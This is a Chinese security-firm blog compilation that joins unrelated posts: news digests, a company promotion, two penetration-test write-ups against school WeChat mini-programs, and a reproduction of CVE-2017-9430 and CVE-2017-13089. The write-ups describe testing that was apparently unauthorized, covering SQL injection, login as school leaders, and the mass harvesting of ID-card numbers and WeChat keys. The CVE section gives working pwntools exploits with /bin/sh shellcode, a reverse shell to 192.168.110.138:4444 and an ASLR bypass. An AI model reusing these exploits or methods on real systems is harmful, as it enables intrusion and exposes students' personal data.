前话： 对登录方法的轻视造成一系列的漏洞出现，对接口确实鉴权造成大量的信息泄露。从小程序到web端网址的奇妙的测试就此开始。（文章厚码，请见谅） 1. 寻找到目标站点的小程序 进入登录发现只需要姓名加学工号就能成功登录，通过googlehack的语法成功找到学生姓名和学号，想直接找老师的工号发现无果，信息收集到此为止 2. 通过学生的信息成功登录进去，进入熟悉的测试环节，成功找到sql注入 使用sqlmap成功跑出 3. 本以为测试到此位置了，突然在某个功能点有了意外之喜，发现了老师的工号，果断深度利用一手 竟然找到了老师的工号和身份证 既然教师的接口泄露的老师的工号，那领导的接口不也会泄露，果断放弃老师的工号，前去寻找领导的工号，果不其然 肯定挑官大的搞， 4. 成功通过领导的工号登录 权限有点大，找找还有利用的地方吗 5. 敏感信息泄露 成功找到一处接口，存在信息泄露，通过遍历得到大量身份证 几万条信息泄露还是有的 6. 转战web端的学工系统，发现是扫码登录，结合上面的领导账号尝试登录 通过微信绑定的手机号获取验证码，尝试能否登录 成功登录 7. 目录遍历 通过对该站点的测试发现该站点还存在目录遍历 篇幅有限，点到为止 总结： 建议学校对用户登录时多做校验，防止任意用户登录，对接口增加鉴权，对特殊字符进行过滤，加强网址的安全防护。在任何情况下，未经授权的渗透测试行为都是违法的，可能导致严重的法律后果。因此，在进行任何安全测试之前，请务必与目标单位达成明确的协议和授权。

2024年4月12日，安全牛第十一版《中国网络安全行业全景图》正式发布。本次发布的全景图，细分领域共收录2413项，收录国内网络安全厂商454家。 蚁景科技作为可靠的网络安全人才培养服务提供商，成功入选安全牛第十一版《中国网络安全行业全景图》的【安全靶场】、【安全意识与培训】细分领域。 本次入选《中国网络安全行业全景图》（第十一版），是网安行业权威研究机构对蚁景科技企业实力和品牌影响力的高度认可。 未来，蚁景科技将继续坚持优化人才培养、技术创新和产业发展的良性生态，致力于培养更多的网络安全专业优秀人才，推动网安技术教学的创新和应用，为网安人才实战能力的全面提升贡献力量。 关于蚁景科技 湖南蚁景科技有限公司作为专业的“网络安全人才培养服务提供商”，为配合国家网络安全人才培养战略，以市场需求为导向，以能力提升为目标，从高校科研、教学实训及企事业单位实际需求出发，基于对“互联网+教育”的深刻理解，通过自主研发的网络安全人才实训靶场——蚁景网安实验室，为高校、政企单位、科研院所等行业客户提供满足在线实验教学的虚拟实验环境与各种课件资源，同时为高校网络信息安全相关专业学生及广大网安爱好者提供网络安全认知实习、实习实训、技能培训、人才推荐等服务。

1、研究人员披露名为DarkBeatC2的攻击框架 https://www.deepinstinct.com/blog/darkbeatc2-the-latest-muddywater-attack-framework 研究人员称发现了一个以前未报告的C2框架，并认为APT组织MuddyWater使用了该攻击框架。与MuddyWater以前使用的C2框架相似，它是管理所有受感染计算机的中心点。攻击者通常通过以下几种方式建立与C2服务器的连接：1、手动执行PowerShell代码，以便在通过其他方法获得初始访问权限后与C2建立连接；2、以鱼叉式网络钓鱼邮件的形式传播恶意载荷；3、通过伪装合法应用程序来侧加载恶意DLL以执行代码，从而建立C2连接 2、比特梵德修复其GravityZone安全平台中的安全漏洞 https://cybersecuritynews.com/bitdefender-vulnerabilities-attack-control 比特梵德的GravityZone安全平台存在一个安全漏洞，CVSS评分为8.1，该漏洞可能允许攻击者远程访问并以低权限攻击服务器。该漏洞可使攻击者完全控制服务器的机密性、完整性和可用性。另一个漏洞与不正确的正则表达式相关，攻击者可以伪造服务器端请求并操纵更新中继配置。比特梵德发布了安全更新，以修复GravityZone中的这两个漏洞，即CVE-2024-2223和 CVE-2024-2224。 3、攻击者利用FatalRAT针对加密货币用户进行攻击 https://cyble.com/blog/fatalrats-new-prey-cryptocurrency-users-in-the-crosshairs 研究人员近期发现了一种针对加密货币用户的网络钓鱼活动。该活动传播了FatalRAT以及其他恶意功能模块，例如Clipper和Keylogger，并使用DLL侧加载技术来加载这些恶意软件及恶意功能模块。FatalRAT是一种远控木马，此次攻击活动攻击者传播的远控木马中包含一个Clipper模块，表示攻击者更加侧重于针对加密货币用户进行攻击。 4、美国资讯公司GMA披露数据泄露事件 https://cybernews.com/news/social-security-numbers-data-breach-gma 由于某种原因在花了九个月的时间后，美国咨询公司Greylock McKinnon Associates（GMA）披露了数据泄露事件，并表示该事件影响340000个社会安全号码。据该公司称，受影响的信息可能包括姓名、出生日期、地址、医疗保险索赔号码（包含与成员相关的社会安全号码）以及其他医疗或健康保险数据。有关此次事件的更多细节尚未公布。 5、美国富国银行向其客户通报数据泄露事件 https://cybernews.com/news/wells-fargo-suffers-data-breach 美国跨国银行富国银行（Wells Fargo）已向其客户通报了数据泄露事件。涉及的信息包括客户姓名和抵押贷款帐号。富国银行发言人表示，一名员工违反公司政策，将信息发送到他的个人帐户。此人已不再受雇于富国银行，并且有两名客户收到了有关数据泄露的通知。目前尚不清楚攻击何时发生，以及未经授权的个人可能访问了这些敏感信息多长时间。 6、Node.js中的高危漏洞，影响Windows平台中的多个版本 https://cybersecuritynews.com/node-js-flaw-malicious-code Node.js项目披露了一个高危安全漏洞，该漏洞影响了其在Windows平台中的多个发布版本。该漏洞被标识为CVE-2024-27980，攻击者能够利用该漏洞在受影响的系统上执行任意命令，对基于Node.js构建的应用程序和服务构成严重风险。鉴于该漏洞较为严重，建议Node.js用户立即更新至最新版本。 7、勒索软件组织声称从芯片制造商Nexperia窃取了大量数据 https://www.securityweek.com/ransomware-group-claims-theft-of-data-from-chipmaker-nexperia/ Dark Angels (Dunghill) 勒索软件组织声称从 Nexperia 窃取了 1 Tb 数据，目前 Nexperia 正在调查该事件。芯片制造商 Nexperia 已确认成为黑客的目标，此前一个已知的勒索软件组织声称从该公司的系统中窃取了大量数据。 8、乌克兰使用破坏性ICS恶意软件“Fuxnet”攻击俄基础设施 https://www.securityweek.com/destructive-ics-malware-fuxnet-used-by-ukraine-against-russian-infrastructure/ 工业和企业物联网网络安全公司 Claroty 对 Fuxnet 进行了分析，Fuxnet 是乌克兰黑客最近在针对俄罗斯地下基础设施公司的攻击中使用的一款工业控制系统 (ICS) 恶意软件。 9、Juniper发布数十个安全公告修补多个产品漏洞 https://www.securityweek.com/juniper-networks-publishes-dozens-of-new-security-advisories/ 瞻博网络上周发布了数十份公告，详细介绍了 Junos OS、Junos OS Evolved 和其他产品中的一百多个漏洞。 10、英特尔和联想 BMC 存在未修补的 Lighttpd 漏洞 https://thehackernews.com/2024/04/intel-and-lenovo-bmcs-contain-unpatched.html Binarly 的新发现显示，英特尔和联想等设备供应商仍未修补影响底板管理控制器 ( BMC )中使用的 Lighttpd Web 服务器的安全漏洞。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

挖掘目标的部署在微信的资产(减少信息的收集，毕竟一般web站点没有账号密码不好进入后台，挖掘功能点少) 1.寻找目标的微信小程序(非原图) 2.招生小程序打不开，只能挖掘管理系统 进入后发现存在上报安全隐患功能，可以上传图片 3.准备上传shell 发现控制上传名字参数为name，不是filename 修改后成功上传php脚本 4.放在浏览器发现不解析，直接下载，只能尝试上传xss 存储型xss加1 5.弱口令尝试失败，但是发现为Nginx搭建的(使用Wappalyer扩展) 6.因为之前有文件上传的漏洞，又是Nginx搭建的，通过Nginx的目录穿越漏洞去尝试任意文件覆盖(为了防止这个平台崩溃，只覆盖自己进行目录穿越后的文件) 覆盖前： (看上传文件路径，为uploads下，原为日期20240312下) 覆盖后： 任意文件覆盖加1，扩大危害(可以覆盖网站配置文件导致网站崩溃，也可以覆盖登录页面的js文件来进行钓鱼) 7.微信小程序测试完了(没有授权，不敢扩大危害获取账号密码)，就去试试公众号上的服务 没有账号密码可以进入的只有这个预约系统，直接bp启动(公众号图片不是原图，原图特征太明显了) 8.进入后没有什么功能点，成功fuzz出信息 尝试userid遍历，没有反应 直接寻找get请求放在Intruder模块进行接口fuzz(/api/user/下) 成果: creatorId对应值为身份证，敏感信息泄露加1 9.对fuzz出来的role接口进行拼接尝试 简单尝试下发现g了(没有权限) 10.峰回路转，之前测试这个没有写报告，重新测试时，接口fuzz的接口记错了，结果在上一级目录下又进行了一次fuzz(/api/下)，发现 微信ak-sk加access_token 身份证等敏感信息 主要这个接口的值还是实时刷新的，信息会变(看前后idCard匹配对比) 总结： 文件上传漏洞不能解析(低危漏洞)，但是碰见合适的框架漏洞(Nginx的目录穿越)，就变成的高危的任意文件覆盖，测试功能点找不到接口，试试接口fuzz，一下信息全部出来，立马高危，修复建议：修复历史漏洞，加强接口鉴权。

1、攻击者通过WSF脚本文件传播Raspberry Robin恶意软件 https://threatresearch.ext.hp.com/raspberry-robin-now-spreading-through-windows-script-files Raspberry Robin于2021年底首次被发现，是一种Windows蠕虫。研究人员发现攻击者传播Raspberry Robin的方式发生了变化。该恶意软件现在通过Windows脚本文件（WSF）进行传播。这些脚本经过高度混淆处理，并使用了一系列反分析技术，使恶意软件能够逃避检测。感染后，该恶意软件通过Tor与其命令和控制（C2）服务器进行通信。Raspberry Robin能够下载和执行额外的载荷文件 2、TA547使用Rhadamanthys窃密木马针对德国企业进行攻击 https://www.proofpoint.com/us/blog/threat-insight/security-brief-ta547-targets-german-organizations-rhadamanthys-stealer 研究人员发现TA547针对德国组织开展了钓鱼邮件攻击活动，以传播Rhadamanthys窃密木马。这是研究人员首次观察到TA547使用Rhadamanthys，这是一种被多个攻击者所使用的窃密木马。 此外，TA547使用了恶意的PowerShell脚本，研究人员认为该脚本是由 ChatGPT、Gemini、CoPilot等大型语言模型（LLM）生成的。 3、法国足球俱乐部巴黎圣日耳曼遭受网络攻击 https://cybersecuritynews.com/french-football-club-cyber-attack/ 4月3日，法国足球俱乐部巴黎圣日耳曼（PSG）的信息系统部门检测到了对其俱乐部票务系统的“异常访问”。该俱乐部表示，目前没有证据表明任何数据被攻击者提取或利用。然而，此次事件确实暴露了某些类型的身份数据，包括姓名、电子邮件和邮政地址、手机号码、出生日期、账户状态以及部分模糊的IBAN。俱乐部向支持者保证，他们已采取一切必要措施来解决这种情况并防止此类事件再次发生。 4、思科NX-OS网络管理平台存在安全漏洞 https://cybersecuritynews.com/cisco-nexus-dashboard-vulnerability/ Cisco Nexus Dashboard Fabric Controller是适用于所有支持NX-OS的网络管理平台。研究人员在Cisco Nexus Dashboard交换矩阵控制器中发现一个新漏洞，该漏洞与带外（OOB）即插即用（PnP）功能相关。该漏洞允许未经身份验证的远程攻击者读取受影响设备上的任意文件。思科已经对该漏洞进行了修复，并发布了相关安全公告。该漏洞的CVE编号为CVE-2024-20348，评分为7.5。 5、Fortinet修复了其产品中的安全漏洞 https://securityaffairs.com/161674/security/forticlientlinux-rce.html Fortinet解决了FortiOS和其他产品中的多个漏洞，包括FortiClientLinux中的一个关键远程代码执行漏洞。该漏洞被标记为CVE-2023-45590，CVSS评分为9.4。该漏洞是FortiClientLinux中存在的代码生成控制不当（“代码注入”）问题。未经身份验证的攻击者可诱导FortiClientLinux用户访问特制网站，从而触发该漏洞以执行任意代码。 6、Palo Alto 称其防火墙中的漏洞被恶意利用 https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/ Palo Alto Networks警告称，其PAN-OS防火墙中未修补的关键命令注入漏洞正在被攻击者恶意利用。该漏洞被标记为CVE-2024-3400，是一个命令注入漏洞，其CVSS评分为10.0，因为它不需要特殊权限或用户交互即可利用。研究人员称，目前有82000台暴露的在线设备可能容易受到CVE-2024-34000的攻击。 7、Roku警告576000个账号遭受撞库攻击的影响 https://www.bleepingcomputer.com/news/security/roku-warns-576-000-accounts-hacked-in-new-credential-stuffing-attacks Roku警告称，在3月初披露了一起入侵15000个账号的事件后，有576000个账号在新的撞库攻击中被黑客入侵。该公司表示，攻击者使用从其他在线平台窃取的登录信息，在撞库攻击中入侵尽可能多的活跃Roku账号。在发现第二波撞库攻击后，Roku已经重置了所有受影响账号的密码，并直接将该事件通知受影响的客户。 8、微软修复了两个被积极利用的安全漏洞 https://securityaffairs.com/161692/security/two-zero-day-malware-attacks.html 微软修复了两个零日漏洞，分别被标记为CVE-2024-29988和CVE-2024-26234，攻击者正在利用这些漏洞来传播恶意软件。CVE-2024-29988是SmartScreen安全提示功能绕过漏洞，该漏洞在野外被积极利用，但微软尚未在公告中证实。CVE-2024-26234是一种代理驱动程序欺骗漏洞，恶意的驱动程序将会使用有效的微软硬件发布者证书签名，以部署后门程序。 9、德国数据库公司Genios确认遭受勒索软件攻击 https://therecord.media/genios-germany-ransomware-attack GBI Genios是一家被德国众多媒体机构使用的数据库公司，该公司称其服务器遭受黑客攻击，并证实该事件是勒索软件攻击。这家总部位于慕尼黑的公司是“法兰克福汇报”和德国商报媒体集团的子公司。除媒体实体外，该公司的数据库还被大学和图书馆广泛使用。“法兰克福汇报”的一位发言人表示，其系统及其子公司没有受到影响。目前受害公司尚未针对此事透露更多细节。 10、研究人员称LockBit勒索组织可能更名为DarkVault https://cybernews.com/news/lockbit-dark-vault-rebrand 研究人员称，LockBit勒索组织似乎正计划更名为DarkVault。研究人员在查看DarkVault最近推出的网站时，发现其网站的一些部分存在与LockBit网站相似的元素，这可能是由于攻击者的失误而导致。在某一时刻，LockBit一定意识到了这个错误，现在DarkVault网站中与Lockbit相似的元素都已经消失了。目前DarkVault网站中尚未列出受害者列表。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、8220挖矿组织利用ScrubCrypt加载器传播VenomRAT https://www.fortinet.com/blog/threat-research/scrubcrypt-deploys-venomrat-with-arsenal-of-plugins 研究人员最近发现一个由攻击者分发的包含恶意SVG文件的网络钓鱼电子邮件。该电子邮件引诱受害者点击附件，该附件会下载一个ZIP文件，其中包含使用BatCloak工具混淆的Batch文件，然后使用ScrubCrypt加载器投放最终有效载荷VenomRAT，同时保持与命令和控制（C2）服务器的连接，以在受害者的环境中下载执行其他恶意软件，包括其他版本的VenomRAT、Remcos、XWorm、NanoC 2、攻击者利用恶意Visual Studio项目传播Keyzetsu恶意软件 https://www.bleepingcomputer.com/news/security/malicious-visual-studio-projects-on-github-push-keyzetsu-malware/ 攻击者正在滥用GitHub自动化功能和恶意Visual Studio项目来传播“Keyzetsu”剪贴板劫持器的新变种以窃取加密货币。该恶意软件活动使用了多个以热门主题和项目命名的GitHub存储库，攻击者利用GitHub Actions修改日志文件并进行微小的随机更改，以非常高的频率自动更新这些存储库。这样做是为了让存储库在按“最近更新”排序的搜索结果中排名靠前。另一 3、研究人员披露Pikabot恶意软件使用的混淆手段 https://www.zscaler.com/blogs/security-research/automating-pikabot-s-string-deobfuscationes/ Pikabot是一种恶意软件加载器，最初于2023年初出现，其突出功能之一是代码混淆，用以规避检测并阻止安全人员进行逆向分析。Pikabot采用混淆手段来加密二进制字符串，包括命令和控制（C2）服务器的地址。研究人员发现，在2024年初出现的Pikabot新变种中，混淆手段出现了变化：以前版本的Pikabot使用由AES-CBC和RC4 算法组合的加密技术，而这些技术已被更简单的算法所取代。 4、研究人员披露Spectre V2漏洞，影响英特尔CPU+Linux组合 https://www.bleepingcomputer.com/news/security/new-spectre-v2-attack-impacts-linux-systems-on-intel-cpus/ 研究人员已经证明了Spectre V2漏洞，该漏洞是一种新的推测执行侧信道漏洞，该漏洞会影响在许多Intel CPU上运行的Linux系统。推测执行是一种性能优化技术，现代处理器可以猜测接下来将执行哪些指令，并在知道需要它们之前开始实现它们。虽然此功能提高了性能，但它也会在CPU缓存中留下特权数据的痕迹，从而引入安全风险，包括帐户密码、加密密钥、敏感的个人或公司信息、软件代码等。两种 5、新的勒索组织Muliaka针对俄罗斯企业进行攻击 https://therecord.media/muliaka-ransomware-group-targeting-russian-businesses-conti 一个以前不为人知的勒索组织在使用Conti黑客组织泄露的源代码，使用勒索软件攻击俄罗斯企业。研究人员将该组织称为“Muliaka”，意为“浑水”，其攻击留下的痕迹很少，但可能至少自2023年12月以来就一直活跃。攻击者通过加密Windows系统和VMware ESXi虚拟基础设施来攻击一家未具名的俄罗斯企业。为了远程访问受害者的设备，攻击者使用了该公司的虚拟专用网络（VPN）服务，并将勒索软件伪装成安装在公司计算机上的流行企业 6、谷歌将删除收集的数百万用户的浏览器搜索记录 https://www.secrss.com/articles/65108 美国加利福尼亚州的三名原告提起了一项集体诉讼，称谷歌可能违反了联邦窃听法和加利福尼亚州的隐私法，并提出了至少 50 亿美元的赔偿请求。 7、美国环保署遭黑客攻击，近千万用户数据泄露 https://www.hackread.com/us-environmental-protection-agency-hacked-data-leaked/ 美国环境保护署(EPA)发生大规模数据泄露事件，超过 850 万用户数据遭泄露。化名“USDoD”的黑客上周日宣布对该事件负责，并声称泄露了 EPA 的客户和承包商的个人敏感信息。 8、Crowdfense扩大零日漏洞收购规模，预算高达3000万美元 https://www.secrss.com/articles/65139 零日漏洞经纪公司Crowdfense近日宣布更新其漏洞收购计划，报价高达3000万美元（约合人民币2.17亿元）。 9、eXotic Visit间谍软件活动针对印度和巴基斯坦的安卓用户 https://thehackernews.com/2024/04/exotic-visit-spyware-campaign-targets.html 一个名为 eXotic Visit 的活跃 Android 恶意软件活动主要针对南亚用户，特别是印度和巴基斯坦的用户，恶意软件通过专门网站和 Google Play 商店分发。 10、Fortinet 推出针对FortiClientLinux漏洞的安全补丁 https://thehackernews.com/2024/04/fortinet-has-released-patches-to.html Fortinet 已发布补丁来解决影响 FortiClientLinux 的关键安全漏洞，该漏洞可被利用来实现任意代码执行。该漏洞的编号为 CVE-2023-45590，CVSS 评分为 9.4 分（满分 10 分）。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

最近复现了两个栈溢出漏洞的cve，分别是CVE-2017-9430和CVE-2017-13089，简单记录一下real wrold中的栈溢出漏洞学习。目前，栈溢出漏洞主要出现在iot固件中，linux下的已经很少了，所以这两个洞都是17年，比较早，但还是能学到一些东西。 CVE-2017-9430 1.漏洞描述 dnstracer 1.9 及之前版本中基于堆栈的缓冲区溢出允许攻击者通过命令行造成拒绝服务（应用程序崩溃），或者可能通过命令行造成未指定的其他影响。 2.环境搭建 编译安装DNSTracer 1.9 wget http://www.mavetju.org/download/dnstracer-1.9.tar.gz tar zxvf dnstracer-1.9.tar.gz cd dnstracer-1.9 ./confugure make && sudo make install 在make前，修改Makefile CC = gcc -fno-stack-protector -z execstack -D_FORTIFY_SOURCE=0 -no-pie -m32 编译好后，关闭ASLR sudo echo 0 > /proc/sys/kernel/randomize_va_space 或者 sudo sh -c "echo 0 > /proc/sys/kernel/randomize_va_space" 3.漏洞成因 程序在处理命令行参数时，调用strcpy函数对argv[0]进行处理时，由于处理不当，导致了栈溢出漏洞。 4.漏洞利用 这里在进行利用时，关闭了ASLR、PIE、Canary、RELRO、NX等缓解机制。 由于strcpy未对参数长度进行检查，这里导致的栈溢出漏洞可以溢出足够的字符长度，并且关闭了各种缓解机制，所以我们通过返回到shellcode的方式获取shell。但在复现的过程中，发现一个有趣的地方。如果我直接溢出到返回地址，并不能完成预想的get shell。回到汇编 发现了问题，这里在ret之前，栈指针变了，是由ecx的值决定的，而ecx是从栈pop出来的。分析这段汇编代码发现，如果正常情况下，最后esp的位置和直接返回的没有这段处理代码的位置相同，但由于由这段代码，就导致不能直接覆盖到返回地址，否则会在执行倒数第二条汇编指令时触发非法地址。 所以，这里不能直接覆盖到返回地址，而是要通过布置栈中数据控制ecx，从而将ecx-4处的地址赋给esp，使esp指向存有shellcode地址的位置，这样就可以正常完成get shell了。 内存布局如下图 exp如下： #!/usr/bin/python3 # -*- encoding: utf-8 -*- from pwn import * context(os = 'linux', arch = 'amd64', log_level = 'info') # context(os = 'linux', arch = 'amd64', log_level = 'debug') context.terminal = ['tmux', 'splitw', '-h'] elf = './dnstracer-1.9/dnstracer' # elf = ELF('./simpleinterpreter') #----------------------------------------------------------------------------------------- rv = lambda x           : p.recv(x) rl = lambda a=False     : p.recvline(a) ru = lambda a,b=True     : p.recvuntil(a,b) rn = lambda x           : p.recvn(x) sn = lambda x           : p.send(x) sl = lambda x           : p.sendline(x) sa = lambda a,b         : p.sendafter(a,b) sla = lambda a,b         : p.sendlineafter(a,b) u32 = lambda             : u32(p.recv(4).ljust(4,b'\x00')) u64 = lambda             : u64(p.recv(6).ljust(8,b'\x00')) inter = lambda           : p.interactive() debug = lambda text=None : gdb.attach(p, text) lg = lambda s,addr       : log.info('\033[1;31;40m %s --> 0x%x \033[0m' % (s,addr)) #----------------------------------------------------------------------------------------- if __name__ == "__main__": filling = "\x90"*(1050-32-32-1-0x300)    filling += "\x4c\xcd\xff\xff"     # ShellcodeAddress    filling += "\x90"*0x300       # 0xffffcd4c    filling += "\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xc1\x89\xc2\xb0\x0b\xcd\x80"+"aa"    filling += "bbbb"*4    filling += "\x4c\xcd\xff\xff" # ecx   esp=[ecx-4]    payload = filling    p = gdb.debug([elf, payload],"b *0x0804969E")    inter() 5.坑点 在复现的时候还有一些坑点，我暂时也不知道原因。 ①第一点就是这个在返回前对esp进行处理的汇编，我不知道为什么我编译出来的程序会有这一段，在网上看其他师傅复现的文档，都没有遇到这个问题，疑惑ing。 ②第二点是我在复现的时候，明明已经关闭了ASLR了，按理说每次调试的时候，栈地址应该不会变才对，但事实上，我当天的地址是固定的，但隔天可能就会有0x10的偏移，很诡异，这就导致exp无法稳定攻击，为此只能在shellcode前面加很多的nop，让这个地址即使发生了偏移也能完成利用。 CVE-2017-13089 1.漏洞描述 http.c：skip_short_body（） 函数在某些情况下被调用，例如在处理重定向时，在 1.19.2 之前的 wget 中分块发送响应时，块解析器使用 strtol（） 读取每个块的长度，但不检查块长度是否为非负数，然后，代码尝试使用 MIN（） 宏跳过 512 字节的块，但最终将负块长度传递给 connect.c：fd_read（），由于 fd_read（） 采用 int 参数，因此丢弃了块长度的 32 位高位，使 fd_read（） 具有完全由攻击者控制的长度参数。 2.环境搭建 在ubuntu16.04下搭建会比较稳定。 sudo apt-get install libneon27-gnutls-dev wget https://ftp.gnu.org/gnu/wget/wget-1.19.1.tar.gz tar zxvf wget-1.19.1.tar.gz cd wget-1.19.1 sudo apt-get remove wget ./configure make && sudo make install 3.漏洞成因 由于使用strtol来读取每个块的长度，但没有进行负数检查。 例如读入长度为-0xFFFFF000，经过处理得到v22为0xffffffff00001000 后面有3次对长度的校验，但都只进行了上限校验，未进行下限校验，由于v22是int，且符号位为1，都满足校验条件，最终将长度传入函数fd_read。 由于fd_read()函数的长度参数即a3为无符号数，就使得读取的长度由用户可控，造成了栈溢出。 4.漏洞利用 这里在进行利用时，我们首先关闭ASLR、PIE、Canary、RELRO、NX等缓解机制。 根据漏洞成因的分析，我们可以先构造poc，控制读取的长度为我们利用需要的size，这里我设置为0x1000，相应poc如下 payload = """HTTP/1.1 401 Not Authorized Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive -0xFFFFF000 """ 调试方式： 生成poc python3 exp.py 发包窗口 nc -lp 6666 < poc2             gdb调试窗口 gdb wget b *addr r localhost:6666 先执行exp,生成poc，然后发包，然后执行wget http://localhost:6666 这个的栈溢出就比前面那个cve的栈溢出正常一点，直接覆盖返回地址为shellcode的地址就可以了。由于我们这里关闭了所有缓解机制，就直接在栈中布置shellcode，获取shellcode地址，覆盖到返回地址就ok了。 exp如下 from pwn import * payload = """HTTP/1.1 401 Not Authorized Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive -0xFFFFF000 """ context(arch='amd64', os='linux') sc = asm(shellcraft.connect('127.0.0.1',4444)+shellcraft.dupsh()) #print(sc) payload = payload.encode() payload += sc + (560+8-len(sc))*b'\x90' #栈偏移量568 stack = 0x7fffffffd190 payload += p64(stack) #输入数据起始地址 payload += b"\n0\n" with open('poc2','wb') as f: f.write(payload) 但是，如果开了ASLR，怎么办呢，我们很自然地会想到jmp reg的方式。 首先看看ret的时候，有没有寄存器可以用 很巧，rsi正好指向我们的shellcode，于是我们就可以去找个jmp rsi的gadget完成ASLR的绕过 直接找gadget比较慢，可以先把所有gadget重定向到txt中，然后在txt中查找会比较快 ROPgadget --binary=wget > gadget.txt cat gadget.txt | grep 'jmp rsi' 得到绕过ASLR的exp from pwn import * payload = """HTTP/1.1 401 Not Authorized Content-Type: text/plain; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive -0xFFFFF000 """ context(arch='amd64', os='linux') sc = asm(shellcraft.connect('192.168.110.138',4444)+shellcraft.dupsh()) #print(sc) payload = payload.encode() payload += sc + (560+8-len(sc))*b'\x90' #栈偏移量568 stack = 0x7fffffffd190 jmp_rsi = 0x0000000000475bcb #payload += p64(stack) #输入数据起始地址 payload += p64(jmp_rsi) payload += b"\n0\n" with open('poc2','wb') as f: f.write(payload) 可以看到，成功绕过了ASLR缓解机制，执行shellcode 5.坑点 在复现的过程中，我发现在关闭ASLR时，我通过第一种方式攻击，必须在gdb中执行才能成功，如下图 直接在命令行中执行wget http://localhost:6666会崩溃 但绕过ASLR的exp就可以直接执行，我怀疑是没有把ASLR完全关闭，但查看ASLR的值确实都是0，不知道为啥会这样。 小总结 在对这两个cve的复现中，对栈溢出漏洞的ret2shellcode和jmp reg两种利用方式进行了复习，遇到了一点比较有意思的东西，比如第一个cve中ret前对esp的改变。不论是在ctf中还是realworld，程序的利用最终一定是基于对程序汇编的理解，遇到问题，回归本源。

1、研究人员发现名为RUBYCARP的僵尸网络 https://sysdig.com/blog/rubycarp-romanian-botnet-group/ 研究人员最近发现了一个由罗马尼亚攻击者组织运营的僵尸网络，并将其命名为RUBYCARP。有证据表明，该攻击者已经活跃了至少10年，其主要攻击方法是利用各种公共漏洞和暴力破解攻击来部署僵尸网络。该攻击者通过公共和私人IRC网络进行通信，开发网络武器，并利用其僵尸网络进行挖矿以及发起网络钓鱼攻击获得，以此获取经济利益。 2、威斯康辛州医疗中心GHC-SCW遭受勒索组织攻击 https://www.bleepingcomputer.com/news/security/ghc-scw-ransomware-gang-stole-health-data-of-533-000-people/ 非营利性医疗保健服务提供商威斯康星州中南部团体健康合作社（GHC-SCW 披露，一个勒索组织在1月份入侵了其网络，窃取了包含超过500000人的个人和医疗信息的文件。但是，攻击者未能对受感染的机器进行加密。收到此次事件影响的健康数据包括个人的姓名、地址、电话号码、电子邮件地址、出生或死亡日期、社会安全号码、会员号码以及医疗保险或医疗补助号码。GHC-SCW尚未透露具体的攻击者，但 3、微软于4月份周二补丁日修复多个安全漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-april-2024-patch-tuesday-fixes-150-security-flaws-67-rces/ 微软于2024年4月周二补丁日修复多个安全漏洞，涉及针对150个漏洞和67个远程代码执行漏洞的安全更新。在本次的周二补丁日中，只有3个关键漏洞被修复，但有超过67个远程代码执行（RCE）漏洞。超过一半的RCE漏洞是在Microsoft SQL驱动程序中发现的。 4、研究人员在SharePoint中发现安全漏洞 https://www.bleepingcomputer.com/news/security/new-sharepoint-flaws-help-hackers-evade-detection-when-stealing-files/ Microsoft SharePoint是一个基于Web的协作平台，与Microsoft Office和365集成，主要作为文档管理和数据存储系统。研究人员发现了两种技术，可以使用户能够绕过审计日志或通过以某种方式下载数据或将其伪装成数据同步操作来生成不太敏感的事件。统计人员在2023年11月披露了这些漏洞，但是，这些问题被评估为中等严重性，因此不会立即得到修 5、Rust标准库中存在高危漏洞 https://www.bleepingcomputer.com/news/security/critical-rust-flaw-enables-windows-command-injection-attacks/ Rust标准库中存在高危漏洞，攻击者可以利用Rust标准库中的安全漏洞，以Windows系统为目标进行命令注入攻击。该漏洞被标记为CVE-2024-24576，是由于操作系统命令和参数注入漏洞造成的，这些漏洞可能让攻击者在操作系统上执行恶意命令。GitHub将此漏洞评估为高危，CVSS评分为10/10。未经身份验证的攻击者可以在低复杂度攻击中远程利用它，而无需用户交互。 6、LG智能电视WebOS系统存在安全漏洞 https://www.bleepingcomputer.com/news/security/over-90-000-lg-smart-tvs-may-be-exposed-to-remote-attacks/ 安全研究人员发现了四个漏洞，这些漏洞影响了LG智能电视WebOS系统的多个版本。这些漏洞允许对受影响的模型进行不同程度的未经授权的访问和控制，包括绕过授权、权限提升和命令注入。这些安全漏洞被标记为：CVE-2023-6317 、CVE-2023-6318、CVE-2023-6319、CVE-2023-6320。 7、芬兰阿尔托大学一项新研究表明苹果“强制”收集用户数据 https://www.freebuf.com/news/397382.html 研究人员研究了八款应用程序，分别是Safari，Siri，家庭共享，iMessage，FaceTime，定位服务，查找和Touch ID。他们发现，无论是iPhone、iPad或MacBook，默认应用程序即使在显示为禁用状态时也会收集用户数据，这表明苹果用户无法完全控制他们的隐私。 8、遭受网络攻击后，日本公司 Hoya 被迫暂停生产 https://cybernews.com/news/hoya-cyberattack-affects-production/ 此次网络攻击的全部范围尚未确定。不过，漏洞已经影响到 Hoya 产品的生产和销售。 9、第二个团伙 RansomHub 勒索美国联合健康集团 https://www.inforisktoday.com/second-gang-shakes-down-unitedhealth-group-for-ransom-a-24803 RansomHub声称被盗的Change Healthcare数据涉及“数百万”名美国现役军人和海军人员、医疗和牙科记录、付款和索赔信息、患者社会安全号码等个人信息，以及保险记录、3000多个Change Healthcare解决方案的源代码文件等。 10、随手分享的APP链接，可能会让你“大型社死” https://www.freebuf.com/articles/neopoints/397225.html 